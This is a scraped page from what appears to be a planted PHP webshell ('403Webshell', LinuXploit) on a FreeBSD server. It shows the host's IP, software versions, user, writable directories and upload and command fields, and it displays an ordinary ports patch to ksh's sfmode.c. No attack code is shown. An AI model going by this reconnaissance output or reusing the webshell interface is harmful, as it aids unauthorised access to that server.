403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/shells/ast-ksh/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/shells/ast-ksh/files/patch-src_lib_libast_sfio_sfmode.c
--- src/lib/libast/sfio/sfmode.c.orig	2016-02-28 17:09:23 UTC
+++ src/lib/libast/sfio/sfmode.c
@@ -404,7 +404,6 @@ reg int		local;	/* a local call */
 
 	if(f->mode&SF_GETR)
 	{	f->mode &= ~SF_GETR;
-#if _mmap_worthy
 		if(f->bits&SF_MMAP)
 		{
 			if (!++f->ngetr)
@@ -415,7 +414,6 @@ reg int		local;	/* a local call */
 				f->ngetr = f->tiny[0] = 0;
 			}
 		}
-#endif
 		if(f->getr)
 		{	f->next[-1] = f->getr;
 			f->getr = 0;
@@ -519,12 +517,10 @@ reg int		local;	/* a local call */
 			if((f->flags&(SF_SHARE|SF_PUBLIC)) == (SF_SHARE|SF_PUBLIC) &&
 			   (addr = SFSK(f,0,SEEK_CUR,f->disc)) != f->here)
 			{
-#if _mmap_worthy
 				if((f->bits&SF_MMAP) && f->data)
 				{	SFMUNMAP(f,f->data,f->endb-f->data);
 					f->data = NIL(uchar*);
 				}
-#endif
 				f->endb = f->endr = f->endw = f->next = f->data;
 				f->here = addr;
 			}
@@ -567,13 +563,11 @@ reg int		local;	/* a local call */
 		}
 
 		f->mode = SF_WRITE|SF_LOCK;
-#if _mmap_worthy
 		if(f->bits&SF_MMAP)
 		{	if(f->data)
 				SFMUNMAP(f,f->data,f->endb-f->data);
 			(void)SFSETBUF(f,(Void_t*)f->tiny,(size_t)SF_UNBOUND);
 		}
-#endif
 		if(f->data == f->tiny)
 		{	f->endb = f->data = f->next = NIL(uchar*);
 			f->size = 0;

Youez - 2016 - github.com/yon3zu
LinuXploit